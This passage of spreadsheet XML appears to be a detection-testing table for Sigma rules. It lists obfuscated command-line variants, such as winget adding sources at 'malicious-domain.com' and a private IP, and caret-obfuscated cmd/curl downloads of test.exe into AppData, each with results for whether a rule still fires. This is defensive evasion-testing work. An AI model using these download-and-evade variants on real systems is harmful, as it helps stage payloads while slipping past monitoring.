      </c>
      <c r="E1669" s="44" t="inlineStr">
        <is>
          <t>winget "source" "add" --no-deps CustomRepo --accept-source-arms https://example.com</t>
        </is>
      </c>
      <c r="F1669" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1669" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1669" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1669" s="44" t="n"/>
      <c r="J1669" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1669" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1670" ht="15.75" customHeight="1" s="42">
      <c r="A1670" s="43" t="n"/>
      <c r="B1670" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_winget_add_custom_source</t>
        </is>
      </c>
      <c r="C1670" s="44" t="inlineStr">
        <is>
          <t>Add New Download Source To Winget</t>
        </is>
      </c>
      <c r="D1670" s="44" t="inlineStr">
        <is>
          <t>05ebafc8-7aa2-4bcd-a269-2aec93f9e842</t>
        </is>
      </c>
      <c r="E1670" s="44" t="inlineStr">
        <is>
          <t>winget "source" "add" -"n" CustomRepo -a https://example.com</t>
        </is>
      </c>
      <c r="F1670" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1670" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1670" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1670" s="44" t="n"/>
      <c r="J1670" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1670" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1671" ht="15.75" customHeight="1" s="42">
      <c r="A1671" s="43" t="n"/>
      <c r="B1671" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_winget_add_custom_source</t>
        </is>
      </c>
      <c r="C1671" s="44" t="inlineStr">
        <is>
          <t>Add New Download Source To Winget</t>
        </is>
      </c>
      <c r="D1671" s="44" t="inlineStr">
        <is>
          <t>05ebafc8-7aa2-4bcd-a269-2aec93f9e842</t>
        </is>
      </c>
      <c r="E1671" s="44" t="inlineStr">
        <is>
          <t>winget "source" "add" -"n" CustomRepo -"a" https://example.com</t>
        </is>
      </c>
      <c r="F1671" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1671" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1671" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1671" s="44" t="n"/>
      <c r="J1671" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1671" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1672" ht="15.75" customHeight="1" s="42">
      <c r="A1672" s="43" t="n"/>
      <c r="B1672" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_winget_add_custom_source</t>
        </is>
      </c>
      <c r="C1672" s="44" t="inlineStr">
        <is>
          <t>Add New Download Source To Winget</t>
        </is>
      </c>
      <c r="D1672" s="44" t="inlineStr">
        <is>
          <t>05ebafc8-7aa2-4bcd-a269-2aec93f9e842</t>
        </is>
      </c>
      <c r="E1672" s="44" t="inlineStr">
        <is>
          <t>winget "source" "add" -"n" CustomRepo /"a" https://example.com</t>
        </is>
      </c>
      <c r="F1672" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1672" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1672" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1672" s="44" t="n"/>
      <c r="J1672" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1672" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1673" ht="15.75" customHeight="1" s="42">
      <c r="A1673" s="43" t="n"/>
      <c r="B1673" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_winget_add_custom_source</t>
        </is>
      </c>
      <c r="C1673" s="44" t="inlineStr">
        <is>
          <t>Add New Download Source To Winget</t>
        </is>
      </c>
      <c r="D1673" s="44" t="inlineStr">
        <is>
          <t>05ebafc8-7aa2-4bcd-a269-2aec93f9e842</t>
        </is>
      </c>
      <c r="E1673" s="44" t="inlineStr">
        <is>
          <t>winget "source" "add" -N CustomRepo /"a" https://example.com</t>
        </is>
      </c>
      <c r="F1673" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1673" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1673" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1673" s="44" t="n"/>
      <c r="J1673" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1673" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1674" ht="15.75" customHeight="1" s="42">
      <c r="A1674" s="43" t="n"/>
      <c r="B1674" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_winget_add_custom_source</t>
        </is>
      </c>
      <c r="C1674" s="44" t="inlineStr">
        <is>
          <t>Add New Download Source To Winget</t>
        </is>
      </c>
      <c r="D1674" s="44" t="inlineStr">
        <is>
          <t>05ebafc8-7aa2-4bcd-a269-2aec93f9e842</t>
        </is>
      </c>
      <c r="E1674" s="44" t="inlineStr">
        <is>
          <t>winget "source" "add" --no-deps CustomRepo -A https://example.com</t>
        </is>
      </c>
      <c r="F1674" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1674" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1674" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1674" s="44" t="n"/>
      <c r="J1674" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1674" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1675" ht="15.75" customHeight="1" s="42">
      <c r="A1675" s="44" t="n"/>
      <c r="B1675" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_winget_add_insecure_custom_source</t>
        </is>
      </c>
      <c r="C1675" s="44" t="inlineStr">
        <is>
          <t>Add Insecure Download Source To Winget</t>
        </is>
      </c>
      <c r="D1675" s="44" t="inlineStr">
        <is>
          <t>81a0ecb5-0a41-4ba1-b2ba-c944eb92bfa2</t>
        </is>
      </c>
      <c r="E1675" s="44" t="inlineStr">
        <is>
          <t>winget.exe "source" "add" -n evader_repo -a "http://192.168.1.100/repo"</t>
        </is>
      </c>
      <c r="F1675" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1675" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1675" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1675" s="44" t="n"/>
      <c r="J1675" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1675" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1676" ht="15.75" customHeight="1" s="42">
      <c r="A1676" s="44" t="n"/>
      <c r="B1676" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_winget_add_insecure_custom_source</t>
        </is>
      </c>
      <c r="C1676" s="44" t="inlineStr">
        <is>
          <t>Add Insecure Download Source To Winget</t>
        </is>
      </c>
      <c r="D1676" s="44" t="inlineStr">
        <is>
          <t>81a0ecb5-0a41-4ba1-b2ba-c944eb92bfa2</t>
        </is>
      </c>
      <c r="E1676" s="44" t="inlineStr">
        <is>
          <t>winget.exe "source" "add" --no-deps evader_repo -"a" "http://192.168.1.100/repo"</t>
        </is>
      </c>
      <c r="F1676" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1676" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1676" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1676" s="44" t="n"/>
      <c r="J1676" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1676" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1677" ht="15.75" customHeight="1" s="42">
      <c r="A1677" s="44" t="n"/>
      <c r="B1677" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_winget_add_insecure_custom_source</t>
        </is>
      </c>
      <c r="C1677" s="44" t="inlineStr">
        <is>
          <t>Add Insecure Download Source To Winget</t>
        </is>
      </c>
      <c r="D1677" s="44" t="inlineStr">
        <is>
          <t>81a0ecb5-0a41-4ba1-b2ba-c944eb92bfa2</t>
        </is>
      </c>
      <c r="E1677" s="44" t="inlineStr">
        <is>
          <t>winget.exe "source" "add" -N evader_repo --accept-source-arms "http://192.168.1.100/repo"</t>
        </is>
      </c>
      <c r="F1677" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1677" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1677" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1677" s="44" t="n"/>
      <c r="J1677" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1677" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1678" ht="15.75" customHeight="1" s="42">
      <c r="A1678" s="44" t="n"/>
      <c r="B1678" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_winget_add_insecure_custom_source</t>
        </is>
      </c>
      <c r="C1678" s="44" t="inlineStr">
        <is>
          <t>Add Insecure Download Source To Winget</t>
        </is>
      </c>
      <c r="D1678" s="44" t="inlineStr">
        <is>
          <t>81a0ecb5-0a41-4ba1-b2ba-c944eb92bfa2</t>
        </is>
      </c>
      <c r="E1678" s="44" t="inlineStr">
        <is>
          <t>winget.exe "source" "add" -"n" evader_repo /"a" "http://192.168.1.100/repo"</t>
        </is>
      </c>
      <c r="F1678" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1678" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1678" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1678" s="44" t="n"/>
      <c r="J1678" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1678" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1679" ht="15.75" customHeight="1" s="42">
      <c r="A1679" s="44" t="n"/>
      <c r="B1679" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_winget_add_insecure_custom_source</t>
        </is>
      </c>
      <c r="C1679" s="44" t="inlineStr">
        <is>
          <t>Add Insecure Download Source To Winget</t>
        </is>
      </c>
      <c r="D1679" s="44" t="inlineStr">
        <is>
          <t>81a0ecb5-0a41-4ba1-b2ba-c944eb92bfa2</t>
        </is>
      </c>
      <c r="E1679" s="44" t="inlineStr">
        <is>
          <t>winget.exe "source" "add" -n evader_repo -A "http://192.168.1.100/repo"</t>
        </is>
      </c>
      <c r="F1679" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1679" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1679" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1679" s="44" t="n"/>
      <c r="J1679" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1679" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1680" ht="15.75" customHeight="1" s="42">
      <c r="A1680" s="44" t="n"/>
      <c r="B1680" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_winget_add_insecure_custom_source</t>
        </is>
      </c>
      <c r="C1680" s="44" t="inlineStr">
        <is>
          <t>Add Insecure Download Source To Winget</t>
        </is>
      </c>
      <c r="D1680" s="44" t="inlineStr">
        <is>
          <t>81a0ecb5-0a41-4ba1-b2ba-c944eb92bfa2</t>
        </is>
      </c>
      <c r="E1680" s="44" t="inlineStr">
        <is>
          <t>winget.exe "source" "add" -"n" evader_repo -a "http://192.168.1.100/repo"</t>
        </is>
      </c>
      <c r="F1680" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1680" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1680" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1680" s="44" t="n"/>
      <c r="J1680" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1680" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1681" ht="15.75" customHeight="1" s="42">
      <c r="A1681" s="44" t="n"/>
      <c r="B1681" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_winget_add_insecure_custom_source</t>
        </is>
      </c>
      <c r="C1681" s="44" t="inlineStr">
        <is>
          <t>Add Insecure Download Source To Winget</t>
        </is>
      </c>
      <c r="D1681" s="44" t="inlineStr">
        <is>
          <t>81a0ecb5-0a41-4ba1-b2ba-c944eb92bfa2</t>
        </is>
      </c>
      <c r="E1681" s="44" t="inlineStr">
        <is>
          <t>winget.exe "source" "add" /"n" evader_repo -"a" "http://192.168.1.100/repo"</t>
        </is>
      </c>
      <c r="F1681" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1681" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1681" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1681" s="44" t="n"/>
      <c r="J1681" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1681" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1682" ht="15.75" customHeight="1" s="42">
      <c r="A1682" s="44" t="n"/>
      <c r="B1682" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_winget_add_insecure_custom_source</t>
        </is>
      </c>
      <c r="C1682" s="44" t="inlineStr">
        <is>
          <t>Add Insecure Download Source To Winget</t>
        </is>
      </c>
      <c r="D1682" s="44" t="inlineStr">
        <is>
          <t>81a0ecb5-0a41-4ba1-b2ba-c944eb92bfa2</t>
        </is>
      </c>
      <c r="E1682" s="44" t="inlineStr">
        <is>
          <t>winget.exe "source" "add" -n evader_repo --accept-source-arms "http://192.168.1.100/repo"</t>
        </is>
      </c>
      <c r="F1682" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1682" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1682" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1682" s="44" t="n"/>
      <c r="J1682" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1682" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1683" ht="15.75" customHeight="1" s="42">
      <c r="A1683" s="44" t="n"/>
      <c r="B1683" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_winget_add_insecure_custom_source</t>
        </is>
      </c>
      <c r="C1683" s="44" t="inlineStr">
        <is>
          <t>Add Insecure Download Source To Winget</t>
        </is>
      </c>
      <c r="D1683" s="44" t="inlineStr">
        <is>
          <t>81a0ecb5-0a41-4ba1-b2ba-c944eb92bfa2</t>
        </is>
      </c>
      <c r="E1683" s="44" t="inlineStr">
        <is>
          <t>winget.exe "source" "add" /"n" evader_repo -a "http://192.168.1.100/repo"</t>
        </is>
      </c>
      <c r="F1683" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1683" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1683" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1683" s="44" t="n"/>
      <c r="J1683" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1683" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1684" ht="15.75" customHeight="1" s="42">
      <c r="A1684" s="44" t="n"/>
      <c r="B1684" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_winget_add_susp_custom_source</t>
        </is>
      </c>
      <c r="C1684" s="44" t="inlineStr">
        <is>
          <t>Add Potential Suspicious New Download Source To Winget</t>
        </is>
      </c>
      <c r="D1684" s="44" t="inlineStr">
        <is>
          <t>c15a46a0-07d4-4c87-b4b6-89207835a83b</t>
        </is>
      </c>
      <c r="E1684" s="44" t="inlineStr">
        <is>
          <t>winget source add -n evadesource -a https://malicious-domain.com/winget</t>
        </is>
      </c>
      <c r="F1684" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1684" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1684" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1684" s="43" t="inlineStr">
        <is>
          <t>Add New Download Source To Winget (05ebafc8-7aa2-4bcd-a269-2aec93f9e842)</t>
        </is>
      </c>
      <c r="J1684" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1684" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1685" ht="15.75" customHeight="1" s="42">
      <c r="A1685" s="44" t="n"/>
      <c r="B1685" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_winget_add_susp_custom_source</t>
        </is>
      </c>
      <c r="C1685" s="44" t="inlineStr">
        <is>
          <t>Add Potential Suspicious New Download Source To Winget</t>
        </is>
      </c>
      <c r="D1685" s="44" t="inlineStr">
        <is>
          <t>c15a46a0-07d4-4c87-b4b6-89207835a83b</t>
        </is>
      </c>
      <c r="E1685" s="44" t="inlineStr">
        <is>
          <t>winget source add -N evadesource /"a" https://malicious-domain.com/winget</t>
        </is>
      </c>
      <c r="F1685" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1685" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1685" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1685" s="44" t="inlineStr">
        <is>
          <t>Add New Download Source To Winget (05ebafc8-7aa2-4bcd-a269-2aec93f9e842)</t>
        </is>
      </c>
      <c r="J1685" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1685" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1686" ht="15.75" customHeight="1" s="42">
      <c r="A1686" s="44" t="n"/>
      <c r="B1686" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_winget_add_susp_custom_source</t>
        </is>
      </c>
      <c r="C1686" s="44" t="inlineStr">
        <is>
          <t>Add Potential Suspicious New Download Source To Winget</t>
        </is>
      </c>
      <c r="D1686" s="44" t="inlineStr">
        <is>
          <t>c15a46a0-07d4-4c87-b4b6-89207835a83b</t>
        </is>
      </c>
      <c r="E1686" s="44" t="inlineStr">
        <is>
          <t>winget source add -n evadesource -"a" https://malicious-domain.com/winget</t>
        </is>
      </c>
      <c r="F1686" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1686" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1686" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1686" s="44" t="inlineStr">
        <is>
          <t>Add New Download Source To Winget (05ebafc8-7aa2-4bcd-a269-2aec93f9e842)</t>
        </is>
      </c>
      <c r="J1686" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1686" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1687" ht="15.75" customHeight="1" s="42">
      <c r="A1687" s="44" t="n"/>
      <c r="B1687" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_winget_add_susp_custom_source</t>
        </is>
      </c>
      <c r="C1687" s="44" t="inlineStr">
        <is>
          <t>Add Potential Suspicious New Download Source To Winget</t>
        </is>
      </c>
      <c r="D1687" s="44" t="inlineStr">
        <is>
          <t>c15a46a0-07d4-4c87-b4b6-89207835a83b</t>
        </is>
      </c>
      <c r="E1687" s="44" t="inlineStr">
        <is>
          <t>winget source add --no-deps evadesource -"a" https://malicious-domain.com/winget</t>
        </is>
      </c>
      <c r="F1687" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1687" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1687" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1687" s="43" t="inlineStr">
        <is>
          <t>Add New Download Source To Winget (05ebafc8-7aa2-4bcd-a269-2aec93f9e842)</t>
        </is>
      </c>
      <c r="J1687" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1687" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1688" ht="15.75" customHeight="1" s="42">
      <c r="A1688" s="44" t="n"/>
      <c r="B1688" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_winget_add_susp_custom_source</t>
        </is>
      </c>
      <c r="C1688" s="44" t="inlineStr">
        <is>
          <t>Add Potential Suspicious New Download Source To Winget</t>
        </is>
      </c>
      <c r="D1688" s="44" t="inlineStr">
        <is>
          <t>c15a46a0-07d4-4c87-b4b6-89207835a83b</t>
        </is>
      </c>
      <c r="E1688" s="44" t="inlineStr">
        <is>
          <t>winget source add --no-deps evadesource --accept-source-arms https://malicious-domain.com/winget</t>
        </is>
      </c>
      <c r="F1688" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1688" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1688" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1688" s="44" t="inlineStr">
        <is>
          <t>Add New Download Source To Winget (05ebafc8-7aa2-4bcd-a269-2aec93f9e842)</t>
        </is>
      </c>
      <c r="J1688" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1688" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1689" ht="15.75" customHeight="1" s="42">
      <c r="A1689" s="44" t="n"/>
      <c r="B1689" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_winget_add_susp_custom_source</t>
        </is>
      </c>
      <c r="C1689" s="44" t="inlineStr">
        <is>
          <t>Add Potential Suspicious New Download Source To Winget</t>
        </is>
      </c>
      <c r="D1689" s="44" t="inlineStr">
        <is>
          <t>c15a46a0-07d4-4c87-b4b6-89207835a83b</t>
        </is>
      </c>
      <c r="E1689" s="44" t="inlineStr">
        <is>
          <t>winget source add /"n" evadesource -a https://malicious-domain.com/winget</t>
        </is>
      </c>
      <c r="F1689" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1689" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1689" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1689" s="44" t="inlineStr">
        <is>
          <t>Add New Download Source To Winget (05ebafc8-7aa2-4bcd-a269-2aec93f9e842)</t>
        </is>
      </c>
      <c r="J1689" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1689" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1690" ht="15.75" customHeight="1" s="42">
      <c r="A1690" s="44" t="n"/>
      <c r="B1690" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_winget_add_susp_custom_source</t>
        </is>
      </c>
      <c r="C1690" s="44" t="inlineStr">
        <is>
          <t>Add Potential Suspicious New Download Source To Winget</t>
        </is>
      </c>
      <c r="D1690" s="44" t="inlineStr">
        <is>
          <t>c15a46a0-07d4-4c87-b4b6-89207835a83b</t>
        </is>
      </c>
      <c r="E1690" s="44" t="inlineStr">
        <is>
          <t>winget source add -"n" evadesource --accept-source-arms https://malicious-domain.com/winget</t>
        </is>
      </c>
      <c r="F1690" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1690" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1690" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1690" s="43" t="inlineStr">
        <is>
          <t>Add New Download Source To Winget (05ebafc8-7aa2-4bcd-a269-2aec93f9e842)</t>
        </is>
      </c>
      <c r="J1690" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1690" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1691" ht="15.75" customHeight="1" s="42">
      <c r="A1691" s="44" t="n"/>
      <c r="B1691" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_winget_add_susp_custom_source</t>
        </is>
      </c>
      <c r="C1691" s="44" t="inlineStr">
        <is>
          <t>Add Potential Suspicious New Download Source To Winget</t>
        </is>
      </c>
      <c r="D1691" s="44" t="inlineStr">
        <is>
          <t>c15a46a0-07d4-4c87-b4b6-89207835a83b</t>
        </is>
      </c>
      <c r="E1691" s="44" t="inlineStr">
        <is>
          <t>winget source add -"n" evadesource -a https://malicious-domain.com/winget</t>
        </is>
      </c>
      <c r="F1691" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1691" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1691" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1691" s="43" t="inlineStr">
        <is>
          <t>Add New Download Source To Winget (05ebafc8-7aa2-4bcd-a269-2aec93f9e842)</t>
        </is>
      </c>
      <c r="J1691" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1691" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1692" ht="15.75" customHeight="1" s="42">
      <c r="A1692" s="44" t="n"/>
      <c r="B1692" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_winget_add_susp_custom_source</t>
        </is>
      </c>
      <c r="C1692" s="44" t="inlineStr">
        <is>
          <t>Add Potential Suspicious New Download Source To Winget</t>
        </is>
      </c>
      <c r="D1692" s="44" t="inlineStr">
        <is>
          <t>c15a46a0-07d4-4c87-b4b6-89207835a83b</t>
        </is>
      </c>
      <c r="E1692" s="44" t="inlineStr">
        <is>
          <t>winget source add -N evadesource -"a" https://malicious-domain.com/winget</t>
        </is>
      </c>
      <c r="F1692" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1692" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1692" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1692" s="44" t="inlineStr">
        <is>
          <t>Add New Download Source To Winget (05ebafc8-7aa2-4bcd-a269-2aec93f9e842)</t>
        </is>
      </c>
      <c r="J1692" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1692" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1693" ht="15.75" customHeight="1" s="42">
      <c r="A1693" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B1693" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C1693" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D1693" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E1693" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" "curl -o %A^ppData%\test.exe h^t^t^p://[example.com/test.exe]()"</t>
        </is>
      </c>
      <c r="F1693" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1693" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1693" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1693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693" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1693" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1694" ht="15.75" customHeight="1" s="42">
      <c r="A1694" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B1694" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C1694" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D1694" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E1694" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c curl -o %USERPROFILE%\AppData\Roaming\test.exe http://example.com/test.exe</t>
        </is>
      </c>
      <c r="F1694" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1694" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1694" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1694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94" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1694" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1695" ht="15.75" customHeight="1" s="42">
      <c r="A1695" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B1695" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C1695" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D1695" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E1695" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C curl -o %USERPROFILE%\AppData\Roaming\test.exe http://example.com/test.exe</t>
        </is>
      </c>
      <c r="F1695" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1695" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1695" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1695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95" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1695" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1696" ht="15.75" customHeight="1" s="42">
      <c r="A1696" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B1696" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C1696" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D1696" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E1696" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c curl -"o" %USERPROFILE%\AppData\Roaming\test.exe http://example.com/test.exe</t>
        </is>
      </c>
      <c r="F1696" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1696" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1696" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1696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96" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1696" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1697" ht="15.75" customHeight="1" s="42">
      <c r="A1697" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B1697" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C1697" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D1697" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E1697" s="44" t="inlineStr">
        <is>
